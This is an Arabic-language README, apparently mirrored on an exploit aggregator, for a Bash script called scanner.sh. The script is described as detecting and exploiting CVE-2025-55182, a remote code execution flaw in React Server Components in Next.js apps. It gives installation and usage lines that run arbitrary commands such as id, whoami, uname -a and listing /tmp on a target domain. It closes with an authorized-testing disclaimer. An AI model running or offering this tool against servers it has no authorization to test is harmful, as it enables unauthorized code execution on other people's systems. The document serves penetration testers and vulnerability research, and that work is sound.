## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-IAMBLACKSOLO2-BUGBOUNTY-POC-CVE-2025-55182
# ماسح CVE-2025-55182
أداة سطر أوامر بسيطة لاكتشاف واستغلال CVE-2025-55182 (تنفيذ الأكواد عن بُعد في مكونات خادم React) في تطبيقات Next.js. 
## التثبيت
root@kitploit:~
chmod +x scanner.sh
## الاستخدام
root@kitploit:~
# فحص باستخدام الأمر الافتراضي (id)
./scanner.sh -d example.com
# تنفيذ أمر مخصص
./scanner.sh -d example.com -c "whoami"
# باستخدام رابط كامل
./scanner.sh -d https://example.com -c "uname -a"
## الخيارات
* `-d, --domain` \- النطاق/الرابط المستهدف (مطلوب)
* `-c, --command` \- الأمر المراد تنفيذه (الافتراضي: `id`)
## أمثلة
root@kitploit:~
# التحقق مما إذا كان الهدف ضعيفًا
./scanner.sh -d vulnerable-app.com
# الحصول على معلومات النظام
./scanner.sh -d vulnerable-app.com -c "uname -a"
# عرض الملفات
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
## المتطلبات
* Bash
* curl
* openssl
## إخلاء مسؤولية
هذه الأداة لأغراض **التعليم واختبار الأمان المصرح به فقط**. لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك الإذن باختبارها.
## المراجع
* CVE-2025-55182
* تنبيه أمان React